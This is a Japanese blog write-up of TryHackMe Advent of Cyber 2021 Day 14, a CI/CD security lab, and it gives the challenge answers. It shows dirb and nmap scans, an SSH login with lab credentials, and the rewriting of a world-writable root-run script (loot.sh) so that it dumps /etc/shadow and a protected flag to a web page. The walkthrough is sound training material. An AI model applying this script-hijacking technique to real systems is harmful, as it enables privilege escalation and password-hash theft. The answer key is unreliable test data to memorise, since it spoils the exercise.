More than 3 years have passed since last update.

【TryHackMe】Advent of Cyber3 (2021)を続けてみた Day14

Posted at 2021-12-14

Welcome to Advent of Cyber 2021

クリスマスまでの25日間、毎日基本的な知識を学び、初心者向けの新しいセキュリティ演習を行うことで、サイバーセキュリティを始めることができます。

day14

学習目標

CI / CDの概念を理解する
CI / CDに関連するリスクの概要
CI / CDエクスプロイトベクトルの基本的な理解がある

公開されているファイルを探しにいきます。

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.197.99 -o dirb-log
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
OUTPUT_FILE: dirb-log
START_TIME: Wed Dec 15 01:53:26 2021
URL_BASE: http://10.10.197.99/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://10.10.197.99/ ----

┌──(kali㉿kali)-[~]
└─$ sudo nmap -vv -sS -Pn -n -A -p- -T4 10.10.197.99 -o nmap-log
...
Discovered open port 80/tcp on 10.10.197.99
Discovered open port 22/tcp on 10.10.197.99
...

http://10.10.197.99/admin

ls.htmlを読み込んでます。

ssh接続をします。（mcskidy：Password1）

┌──(kali㉿kali)-[~]
└─$ ssh mcskidy@10.10.197.99 -p 22                                                                                                                                  130 ⨯
The authenticity of host '10.10.197.99 (10.10.197.99)' can't be established.
ED25519 key fingerprint is SHA256:9kEyTFIOxOqgfya4ZMo+1VTqJ7nC4zuupBW619K7IZs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.197.99' (ED25519) to the list of known hosts.
mcskidy@10.10.197.99's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1029-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

147 packages can be updated.
99 updates are security updates.


Last login: Thu Nov 11 12:50:44 2021 from 10.9.1.60
mcskidy@ip-10-10-197-99:~$

SSH接続できました。ではだれがいるのか見ます。

mcskidy@ip-10-10-197-99:/home$ ll
total 24
drwxr-xr-x  6 root      root      4096 Nov 11 08:27 ./
drwxr-xr-x 23 root      root      4096 Dec 14 16:47 ../
drwxr-xr-x  5 mcskidy   mcskidy   4096 Nov 11 08:03 mcskidy/
drwxr-xr-x  2 pepper    pepper    4096 Nov 11 08:27 pepper/
drwxr-xr-x  7 thegrinch thegrinch 4096 Nov 11 19:50 thegrinch/
drwxr-xr-x  5 ubuntu    ubuntu    4096 Nov 11 05:52 ubuntu/

/home/thegrinch/scriptsに何があるか確認します。

mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ ll
total 20
drwxr-xr-x 2 root      root      4096 Nov 11 20:03 ./
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ../
-rwx------ 1 root      root       286 Nov 11 20:03 check.sh*
-rwx------ 1 root      root        58 Nov 11 09:00 cleanup.sh*
-rwxrwxrwx 1 root      root        61 Nov 11 19:56 loot.sh*
-rwx------ 1 root      root         0 Nov 11 07:58 test.sh*

passwd情報が記載されている/etc/shadowを見れるか確認します。

mcskidy@ip-10-10-197-99:~$ less /etc/shadow
/etc/shadow: Permission denied

ここで、さきほどのloot.shを確認します。

mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ less loot.sh
# !/bin/bash
ls /home/thegrinch/loot > /var/www/html/ls.html

このshファイルを変更して/etc/shadowをみることが可能かやってみます。

mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh 
# !/bin/bash
cat /etc/shadow > /var/www/html/ls.html

Done!!

/home/thegrinch/Desktopを確認できるか実践。flag,txtを発見。ただしdrwxr-xr-x

mcskidy@ip-10-10-197-99:/home/thegrinch$ ll
total 44
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ./
drwxr-xr-x 6 root      root      4096 Nov 11 08:27 ../
-rw------- 1 thegrinch thegrinch   33 Nov 11 07:46 .bash_history
-rw-r--r-- 1 thegrinch thegrinch  220 Nov 11 05:53 .bash_logout
-rw-r--r-- 1 thegrinch thegrinch 3771 Nov 11 05:53 .bashrc
drwx------ 2 thegrinch thegrinch 4096 Nov 11 05:58 .cache/
drwx------ 3 thegrinch thegrinch 4096 Nov 11 05:58 .gnupg/
-rw-r--r-- 1 thegrinch thegrinch  807 Nov 11 05:53 .profile
-rw-r--r-- 1 thegrinch thegrinch    0 Nov 11 05:58 .sudo_as_admin_successful
drwxr-xr-x 2 root      root      4096 Nov 11 19:50 Desktop/
drwxrwxrwx 2 root      root      4096 Nov 11 20:11 loot/
drwxr-xr-x 2 root      root      4096 Nov 11 20:03 scripts/
mcskidy@ip-10-10-197-99:/home/thegrinch$ ls Desktop/
flag.txt

よって、catコマンドを上手に使う。

mcskidy@ip-10-10-197-99:/home/thegrinch$ cat Desktop/flag.txt 
cat: Desktop/flag.txt: Permission denied

他の道筋を考える。

mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh 
# !/bin/bash
cat /home/thegrinch/Desktop/flag.txt > /var/www/html/ls.html

Answer

How many pages did the dirb scan find with its default wordlist?
4
How many scripts do you see in the /home/thegrinch/scripts folder?
4
What are the five characters following $6$G in pepper's password hash?
ZUP42
What is the content of the flag.txt file on the Grinch's user’s desktop?
DI3H4rdIsTheBestX-masMovie!

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up